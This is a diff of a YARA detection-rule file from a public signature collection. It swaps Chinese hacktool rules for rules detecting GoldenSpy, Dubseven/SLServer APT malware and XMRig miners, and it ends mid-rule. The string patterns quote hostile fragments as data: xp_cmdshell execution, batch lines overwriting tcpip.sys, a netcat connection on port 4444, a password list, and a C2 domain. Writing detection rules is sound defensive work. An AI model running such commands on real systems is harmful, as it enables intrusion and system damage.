-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1060-L1078"
+		description = "Detects variants of GoldenSpy Malware"
+		author = "BKA"
+		id = "4f47087e-6e68-53ff-9446-72a1751da359"
+		date = "2020-08-21"
+		modified = "2023-12-05"
+		reference = "https://www.bka.de/SharedDocs/Kurzmeldungen/DE/Warnhinweise/200821_Cyberspionage.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_goldenspy.yar#L1-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "001c0c01c96fa56216159f83f6f298755366e528"
-		logic_hash = "0e059e90447747ed5259da4a870036d37d181c1cfea734ab25e760e81612f0f3"
-		score = 60
+		logic_hash = "ba81a2b081842aaf06bbf623640a87946894df83fd0d7b7149c48afa8ed0a081"
+		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s0 = "nc -l -p port [options] [hostname] [port]" fullword ascii
-		$s2 = "nc [-options] hostname port[s] [ports] ... " fullword ascii
-		$s3 = "gethostpoop fuxored" fullword ascii
-		$s6 = "VERNOTSUPPORTED" fullword ascii
-		$s7 = "%s [%s] %d (%s)" fullword ascii
-		$s12 = " `--%s' doesn't allow an argument" fullword ascii
+		$str01 = {c78510ffffff00000000 c78514ffffff0f000000 c68500ffffff00 c78528ffffff00000000 c7852cffffff0f000000 c68518ffffff00 c78540ffffff00000000 c78544ffffff0f000000 c68530ffffff00 c645fc14 80bd04feffff00}
+		$str02 = "Ryeol HTTP Client Class" ascii
+		$str03 = "----RYEOL-FB3B405B7EAE495aB0C0295C54D4E096-" ascii
+		$str04 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\fwkp.exe" ascii
+		$str05 = "svmm" ascii
+		$str06 = "PROTOCOL_" ascii
+		$str07 = "softList" ascii
+		$str08 = "excuteExe" ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and 5 of ( $str* )
 }
-rule SIGNATURE_BASE_MS08_067_Exploit_Hacktools_CN
+rule SIGNATURE_BASE_Dubseven_File_Set : FILE
 {
 	meta:
-		description = "Disclosed hacktool set - file cs.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c15836c7-e739-5cc0-9d41-d651ea3e4738"
-		date = "2014-11-17"
-		modified = "2025-12-18"
+		description = "Searches for service files loading UP007"
+		author = "Matt Brooks, @cmatthewbrooks"
+		id = "5b0a9cb9-aeef-5508-8854-51ad846b22c5"
+		date = "2016-04-18"
+		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1080-L1099"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_between-hk-and-burma.yar#L1-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a3e9e0655447494253a1a60dbc763d9661181322"
-		logic_hash = "e5756250de401324d0c86f855bc088c8364e4a632cece25e553939fa621b73d8"
-		score = 60
-		quality = 60
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "af98ab901ca97a350aa837779d74208a780b1099e113cfa59bee2eb33690918e"
+		score = 75
+		quality = 85
+		tags = "FILE"
 
 	strings:
-		$s0 = "MS08-067 Exploit for CN by EMM@ph4nt0m.org" fullword ascii
-		$s3 = "Make SMB Connection error:%d" fullword ascii
-		$s5 = "Send Payload Over!" fullword ascii
-		$s7 = "Maybe Patched!" fullword ascii
-		$s8 = "RpcExceptionCode() = %u" fullword ascii
-		$s11 = "ph4nt0m" fullword wide
-		$s12 = "\\\\%s\\IPC" ascii
+		$file1 = "\\Microsoft\\Internet Explorer\\conhost.exe"
+		$file2 = "\\Microsoft\\Internet Explorer\\dll2.xor"
+		$file3 = "\\Microsoft\\Internet Explorer\\HOOK.DLL"
+		$file4 = "\\Microsoft\\Internet Explorer\\main.dll"
+		$file5 = "\\Microsoft\\Internet Explorer\\nvsvc.exe"
+		$file6 = "\\Microsoft\\Internet Explorer\\SBieDll.dll"
+		$file7 = "\\Microsoft\\Internet Explorer\\mon"
+		$file8 = "\\Microsoft\\Internet Explorer\\runas.exe"
 
 	condition:
-		4 of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and 3 of ( $file* )
 }
-rule SIGNATURE_BASE_Hacktools_CN_Burst_Sql
+rule SIGNATURE_BASE_Dubseven_Dropper_Registry_Checks : FILE
 {
 	meta:
-		description = "Disclosed hacktool set - file sql.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "77ea95fc-7a6a-522b-8a72-1832598c4d2d"
-		date = "2014-11-17"
-		modified = "2025-12-18"
+		description = "Searches for registry keys checked for by the dropper"
+		author = "Matt Brooks, @cmatthewbrooks"
+		id = "8369cdbb-53b8-5dc5-9181-fd49747042a7"
+		date = "2016-04-18"
+		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1101-L1122"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_between-hk-and-burma.yar#L31-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d5139b865e99b7a276af7ae11b14096adb928245"
-		logic_hash = "139f7308055351d9dc8a704c055360ac9408dcefc9eee4b9f222886fb5249b8c"
-		score = 60
+		logic_hash = "813ff641a4213cf9d56013768e284e7f622a223c6c4f585c3bbbcf69fc03723c"
+		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s0 = "s.exe %s %s %s %s %d /save" fullword ascii
-		$s2 = "s.exe start error...%d" fullword ascii
-		$s4 = "EXEC sp_addextendedproc xp_cmdshell,'xplog70.dll'" fullword ascii
-		$s7 = "EXEC master..xp_cmdshell 'wscript.exe cc.js'" fullword ascii
-		$s10 = "Result.txt" fullword ascii
-		$s11 = "Usage:sql.exe [options]" fullword ascii
-		$s17 = "%s root %s %d error" fullword ascii
-		$s18 = "Pass.txt" fullword ascii
-		$s20 = "SELECT sillyr_at_gmail_dot_com INTO DUMPFILE '%s\\\\sillyr_x.so' FROM sillyr_x" fullword ascii
+		$reg1 = "SOFTWARE\\360Safe\\Liveup"
+		$reg2 = "Software\\360safe"
+		$reg3 = "SOFTWARE\\kingsoft\\Antivirus"
+		$reg4 = "SOFTWARE\\Avira\\Avira Destop"
+		$reg5 = "SOFTWARE\\rising\\RAV"
+		$reg6 = "SOFTWARE\\JiangMin"
+		$reg7 = "SOFTWARE\\Micropoint\\Anti-Attack"
 
 	condition:
-		6 of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and all of ( $reg* )
 }
-rule SIGNATURE_BASE_Hacktools_CN_Panda_445TOOL
+rule SIGNATURE_BASE_Dubseven_Dropper_Dialog_Remains : FILE
 {
 	meta:
-		description = "Disclosed hacktool set - file 445TOOL.rar"
-		author = "Florian Roth (Nextron Systems)"
-		id = "02075631-49cc-5b97-ad8e-92d734a26d34"
-		date = "2014-11-17"
-		modified = "2025-12-18"
+		description = "Searches for related dialog remnants. How rude."
+		author = "Matt Brooks, @cmatthewbrooks"
+		id = "6029ea74-26fc-57d1-aaed-be1ea2138844"
+		date = "2016-04-18"
+		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1124-L1140"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_between-hk-and-burma.yar#L59-L80"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "92050ba43029f914696289598cf3b18e34457a11"
-		logic_hash = "69a17bf7735eea946a5326d9535e68b8f010f2a0229875970b1bb15029c6dc4e"
-		score = 60
+		logic_hash = "322ddc1210b6bde393970c61113e6efcb87a3529db386323dfd08973e5d2703e"
+		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s0 = "scan.bat" fullword ascii
-		$s1 = "Http.exe" fullword ascii
-		$s2 = "GOGOGO.bat" fullword ascii
-		$s3 = "ip.txt" fullword ascii
+		$dia1 = "fuckMessageBox 1.0" wide
+		$dia2 = "Rundll 1.0" wide
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and any of them
 }
-rule SIGNATURE_BASE_Hacktools_CN_Panda_445
+rule SIGNATURE_BASE_Maindll_Mutex : FILE
 {
 	meta:
-		description = "Disclosed hacktool set - file 445.rar"
-		author = "Florian Roth (Nextron Systems)"
-		id = "02075631-49cc-5b97-ad8e-92d734a26d34"
-		date = "2014-11-17"
-		modified = "2025-12-18"
+		description = "Matches on the maindll mutex"
+		author = "Matt Brooks, @cmatthewbrooks"
+		id = "7a89dae3-9e03-5803-9729-78e6e65e91d3"
+		date = "2016-04-18"
+		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1142-L1162"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_between-hk-and-burma.yar#L83-L103"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "a61316578bcbde66f39d88e7fc113c134b5b966b"
-		logic_hash = "d3f5b2c601dfa1702bbd1f8bdc1f847dd34ba84a6c527a3e02cdb76075e4ad2c"
-		score = 60
+		logic_hash = "8d3311164104198e02e700c2e9a5293e55d75d63b39c75c4e375b7f35eb5fde4"
+		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s0 = "for /f %%i in (ips.txt) do (start cmd.bat %%i)" fullword ascii
-		$s1 = "445\\nc.exe" fullword ascii
-		$s2 = "445\\s.exe" fullword ascii
-		$s3 = "cs.exe %1" fullword ascii
-		$s4 = "445\\cs.exe" fullword ascii
-		$s5 = "445\\ip.txt" fullword ascii
-		$s6 = "445\\cmd.bat" fullword ascii
-		$s9 = "@echo off" fullword ascii
+		$mutex = "h31415927tttt"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and $mutex
 }
-rule SIGNATURE_BASE_Hacktools_CN_Wineggdrop
+rule SIGNATURE_BASE_Slserver_Dialog_Remains : FILE
 {
 	meta:
-		description = "Disclosed hacktool set - file s.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9b6244ee-5ace-5caa-bfa2-732bcfcfc998"
-		date = "2014-11-17"
-		modified = "2025-12-18"
+		description = "Searches for related dialog remnants."
+		author = "Matt Brooks, @cmatthewbrooks / modified by Florian Roth"
+		id = "cf199d25-ce5e-52c2-88de-32a48dee4c6f"
+		date = "2016-04-18"
+		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1164-L1187"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_between-hk-and-burma.yar#L106-L136"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "7665011742ce01f57e8dc0a85d35ec556035145d"
-		logic_hash = "6123a07038e30e11e37a70b912a1c854c13341e67eaf4ed14ca9954288a42d62"
-		score = 60
+		logic_hash = "5b18f4a6c54b456ae697e9639e8c3041fd4f3141d89850c3e1d3d4e220c3cea3"
+		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s0 = "Normal Scan: About To Scan %u IP For %u Ports Using %d Thread" fullword ascii
-		$s2 = "SYN Scan: About To Scan %u IP For %u Ports Using %d Thread" fullword ascii
-		$s6 = "Example: %s TCP 12.12.12.12 12.12.12.254 21 512 /Banner" fullword ascii
-		$s8 = "Something Wrong About The Ports" fullword ascii
-		$s9 = "Performing Time: %d/%d/%d %d:%d:%d --> " fullword ascii
-		$s10 = "Example: %s TCP 12.12.12.12/24 80 512 /T8 /Save" fullword ascii
-		$s12 = "%u Ports Scanned.Taking %d Threads " fullword ascii
-		$s13 = "%-16s %-5d -> \"%s\"" fullword ascii
-		$s14 = "SYN Scan Can Only Perform On WIN 2K Or Above" fullword ascii
-		$s17 = "SYN Scan: About To Scan %s:%d Using %d Thread" fullword ascii
-		$s18 = "Scan %s Complete In %d Hours %d Minutes %d Seconds. Found %u Open Ports" fullword ascii
+		$slserver = "SLServer" wide fullword
+		$fp1 = "Dell Inc." wide fullword
+		$fp2 = "ScriptLogic Corporation" wide
+		$extra1 = "SLSERVER" wide fullword
+		$extra2 = "\\SLServer.pdb" ascii
 
 	condition:
-		5 of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and not 1 of ( $fp* ) and 1 of ( $extra* ) and $slserver
 }
-rule SIGNATURE_BASE_Hacktools_CN_Scan_BAT
+rule SIGNATURE_BASE_Slserver_Mutex : FILE
 {
 	meta:
-		description = "Disclosed hacktool set - file scan.bat"
-		author = "Florian Roth (Nextron Systems)"
-		id = "836e0618-93c7-5519-bbc4-705ff5c2e127"
-		date = "2014-11-17"
-		modified = "2025-12-18"
+		description = "Searches for the mutex."
+		author = "Matt Brooks, @cmatthewbrooks"
+		id = "decdefd0-fe20-5adf-9d8c-0e2b954481a0"
+		date = "2016-04-18"
+		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1189-L1207"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_between-hk-and-burma.yar#L138-L158"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "6517d7c245f1300e42f7354b0fe5d9666e5ce52a"
-		logic_hash = "eed941d2ad5d33d7224504b08d2104d4043fab7a2ff027fc54cd1afd42e32549"
-		score = 60
+		logic_hash = "9bf3c6c93e77424463e3fb6f9f4d58e80254866462fe1287293b0a357737da20"
+		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s0 = "for /f %%a in (host.txt) do (" ascii
-		$s1 = "for /f \"eol=S tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txt" fullword ascii
-		$s2 = "del host.txt /q" fullword ascii
-		$s3 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" fullword ascii
-		$s4 = "start Http.exe %%a %http%" fullword ascii
-		$s5 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" fullword ascii
+		$mutex = "M&GX^DSF&DA@F"
 
 	condition:
-		5 of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and $mutex
 }
-rule SIGNATURE_BASE_Hacktools_CN_Panda_Burst
+rule SIGNATURE_BASE_Slserver_Command_And_Control : FILE
 {
 	meta:
-		description = "Disclosed hacktool set - file Burst.rar"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e07c66d1-958e-5ad2-9d5b-380d48af8360"
-		date = "2014-11-17"
-		modified = "2025-12-18"
+		description = "Searches for the C2 server."
+		author = "Matt Brooks, @cmatthewbrooks"
+		id = "e4fcda6c-1c9f-5b58-8b07-8d1a0dc4eaf6"
+		date = "2016-04-18"
+		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1209-L1222"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_between-hk-and-burma.yar#L160-L180"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "ce8e3d95f89fb887d284015ff2953dbdb1f16776"
-		logic_hash = "c334019cab377f4d96f5daee6a2f1fa7e24ecc43b3aee1eb76537640fdfd8a97"
-		score = 60
+		logic_hash = "48a13d27b7dc9a7f3a65752142b2a291e7c3ee93ef67b36aa4202d065e74d80e"
+		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s0 = "@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http://60.15.124.106:63389/tasksvr." ascii
+		$c2 = "safetyssl.security-centers.com"
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and $c2
 }
-rule SIGNATURE_BASE_Hacktools_CN_445_Cmd : FILE
+rule SIGNATURE_BASE_Slserver_Campaign_Code : FILE
 {
 	meta:
-		description = "Disclosed hacktool set - file cmd.bat"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b9693f51-26ac-5bf1-8c4d-ca852a154636"
-		date = "2014-11-17"
-		modified = "2025-12-18"
+		description = "Searches for the related campaign code."
+		author = "Matt Brooks, @cmatthewbrooks"
+		id = "672f506e-0cc1-5b09-873b-c3d206486bac"
+		date = "2016-04-18"
+		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1224-L1239"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_between-hk-and-burma.yar#L182-L202"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "69b105a3aec3234819868c1a913772c40c6b727a"
-		logic_hash = "e0ab572fe9009ddc39f34302d8a16531c23f51ce4ea373d57a039f22ccc934c7"
-		score = 60
+		logic_hash = "fbf53678399b0e14eae6f1bb6594b2aa665f76f10388e492bec2f9101a4dd4b1"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$bat = "@echo off" fullword ascii
-		$s0 = "cs.exe %1" fullword ascii
-		$s2 = "nc %1 4444" fullword ascii
+		$campaign = "wthkdoc0106"
 
 	condition:
-		uint32( 0 ) == 0x68636540 and $bat at 0 and all of ( $s* )
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and $campaign
 }
-rule SIGNATURE_BASE_Hacktools_CN_GOGOGO_Bat
+rule SIGNATURE_BASE_Slserver_Unknown_String : FILE
 {
 	meta:
-		description = "Disclosed hacktool set - file GOGOGO.bat"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b52cc150-81d4-5895-8f83-ee2006f75617"
-		date = "2014-11-17"
-		modified = "2025-12-18"
+		description = "Searches for a unique string."
+		author = "Matt Brooks, @cmatthewbrooks"
+		id = "00341604-480f-59aa-9c18-009e7b53928e"
+		date = "2016-04-18"
+		modified = "2023-12-05"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1241-L1266"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_between-hk-and-burma.yar#L204-L224"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4bd4f5b070acf7fe70460d7eefb3623366074bbd"
-		logic_hash = "0209ffba87ff07379c768c1c00496a37f0f9bc6b786a31afdafe55d65a9f39ab"
-		score = 60
+		logic_hash = "18d3bb236282c506c161949883722da1cb0af6dd87bf5cb3d4a5b3d90f4a7db0"
+		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s0 = "for /f \"delims=\" %%x in (endend.txt) do call :lisoob %%x" fullword ascii
-		$s1 = "http://www.tzddos.com/ -------------------------------------------->byebye.txt" fullword ascii
-		$s2 = "ren %systemroot%\\system32\\drivers\\tcpip.sys tcpip.sys.bak" fullword ascii
-		$s4 = "IF /I \"%wangle%\"==\"\" ( goto start ) else ( goto erromm )" fullword ascii
-		$s5 = "copy *.tzddos scan.bat&del *.tzddos" fullword ascii
-		$s6 = "del /f tcpip.sys" fullword ascii
-		$s9 = "if /i \"%CB%\"==\"www.tzddos.com\" ( goto mmbat ) else ( goto wangle )" fullword ascii
-		$s10 = "call scan.bat" fullword ascii
-		$s12 = "IF /I \"%erromm%\"==\"\" ( goto start ) else ( goto zuihoujh )" fullword ascii
-		$s13 = "IF /I \"%zuihoujh%\"==\"\" ( goto start ) else ( goto laji )" fullword ascii
-		$s18 = "sc config LmHosts start= auto" fullword ascii
-		$s19 = "copy tcpip.sys %systemroot%\\system32\\drivers\\tcpip.sys > nul" fullword ascii
-		$s20 = "ren %systemroot%\\system32\\dllcache\\tcpip.sys tcpip.sys.bak" fullword ascii
+		$string = "test-b7fa835a39"
 
 	condition:
-		3 of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and $string
 }
-rule SIGNATURE_BASE_Hacktools_CN_Burst_Pass
+rule SIGNATURE_BASE_XMRIG_Monero_Miner : HIGHVOL FILE
 {
 	meta:
-		description = "Disclosed hacktool set - file pass.txt"
+		description = "Detects Monero mining software"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d8f6784f-80c8-51e2-9d86-40022cd8705d"
-		date = "2014-11-17"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1268-L1291"
+		id = "71bf1b9c-c806-5737-83a9-d6013872b11d"
+		date = "2018-01-04"
+		modified = "2022-11-10"
+		reference = "https://github.com/xmrig/xmrig/releases"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/pua_xmrig_monero_miner.yar#L11-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "55a05cf93dbd274355d798534be471dff26803f9"
-		logic_hash = "3a30cc602a66bd87304756311d56e7c698c1edb0b4b209198c589c4792776992"
-		score = 60
-		quality = 60
-		tags = ""
+		logic_hash = "532e602dfc8e44326e381d0e2a189b60bc4d4f2b310169767b2326e01606a542"
+		score = 75
+		quality = 85
+		tags = "HIGHVOL, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0"
+		hash2 = "08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7"
+		hash3 = "f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5"
+		hash4 = "0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2"
 
 	strings:
-		$s0 = "123456.com" fullword ascii
-		$s1 = "123123.com" fullword ascii
-		$s2 = "360.com" fullword ascii
-		$s3 = "123.com" fullword ascii
-		$s4 = "juso.com" fullword ascii
-		$s5 = "sina.com" fullword ascii
-		$s7 = "changeme" fullword ascii
-		$s8 = "master" fullword ascii
-		$s9 = "google.com" fullword ascii
-		$s10 = "chinanet" fullword ascii
-		$s12 = "lionking" fullword ascii
+		$s1 = "'h' hashrate, 'p' pause, 'r' resume" fullword ascii
+		$s2 = "--cpu-affinity" ascii
+		$s3 = "set process affinity to CPU core(s), mask 0x3 for cores 0 and 1" ascii
+		$s4 = "password for mining server" fullword ascii
+		$s5 = "XMRig/%s libuv/%s%s" fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0x457f ) and filesize < 10MB and 2 of them
 }
-rule SIGNATURE_BASE_Hacktools_CN_Johor_Posts_Killer
+rule SIGNATURE_BASE_XMRIG_Monero_Miner_Config : FILE
 {
 	meta:
-		description = "Disclosed hacktool set - file JoHor_Posts_Killer.exe"
+		description = "Auto-generated rule - from files config.json, config.json"
 		author = "Florian Roth (Nextron Systems)"
-		id = "68bba78e-f3a0-5eaa-9c63-e5f23a76b328"
-		date = "2014-11-17"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1293-L1314"
+		id = "374efe7f-9ef2-5974-8e24-f749183ab2d0"
+		date = "2018-01-04"
+		modified = "2023-12-05"
+		reference = "https://github.com/xmrig/xmrig/releases"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/pua_xmrig_monero_miner.yar#L35-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d157f9a76f9d72dba020887d7b861a05f2e56b6a"
-		logic_hash = "2fc63cd42619a2b92ab8670b14ab4c01eb3b194cd337d329ba224b7088d26318"
-		score = 60
+		logic_hash = "5df14af366cdb0a5bf6fd88b50876fd78abfe0b795cf10af8fab0d23a54f700f"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "031333d44a3a917f9654d7e7257e00c9d961ada3bee707de94b7c7d06234909a"
+		hash2 = "409b6ec82c3bdac724dae702e20cb7f80ca1e79efa4ff91212960525af016c41"
 
 	strings:
-		$s0 = "Multithreading Posts_Send Killer" fullword ascii
-		$s3 = "GET [Access Point] HTTP/1.1" fullword ascii
-		$s6 = "The program's need files was not exist!" fullword ascii
-		$s7 = "JoHor_Posts_Killer" fullword wide
-		$s8 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" fullword ascii
-		$s10 = "  ( /s ) :" fullword ascii
-		$s11 = "forms.vbp" fullword ascii
-		$s12 = "forms.vcp" fullword ascii
-		$s13 = "Software\\FlySky\\E\\Install" fullword ascii
+		$s2 = "\"cpu-affinity\": null,   // set process affinity to CPU core(s), mask \"0x3\" for cores 0 and 1" fullword ascii
+		$s5 = "\"nicehash\": false                  // enable nicehash/xmrig-proxy support" fullword ascii
+		$s8 = "\"algo\": \"cryptonight\",  // cryptonight (default) or cryptonight-lite" fullword ascii
 
 	condition:
-		5 of them
+		( uint16( 0 ) == 0x0a7b or uint16( 0 ) == 0x0d7b ) and filesize < 5KB and 1 of them
 }
-rule SIGNATURE_BASE_Hacktools_CN_Panda_Tesksd
+rule SIGNATURE_BASE_PUA_LNX_XMRIG_Cryptominer : FILE
 {
 	meta:
-		description = "Disclosed hacktool set - file tesksd.jpg"
+		description = "Detects XMRIG CryptoMiner software"
 		author = "Florian Roth (Nextron Systems)"
-		id = "399ff307-c2e8-57bb-b792-a2c599e8686e"
-		date = "2014-11-17"
-		modified = "2025-12-18"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L1316-L1331"
+		id = "bbdeff2e-68cc-5bbe-b843-3cba9c8c7ea8"
+		date = "2018-06-28"
+		modified = "2023-01-06"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/pua_xmrig_monero_miner.yar#L53-L70"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "922147b3e1e6cf1f5dd5f64a4e34d28bdc9128cb"
-		logic_hash = "dc81acef0ad3e6307f68ee755e5b27f2dcf1e2822e560a72dc5ae572703f4459"
-		score = 60
+		logic_hash = "501bc5b2d38882f48d1ef972dbbd379afb89f2e7c9bf69192c7bee2e19384816"
+		score = 75
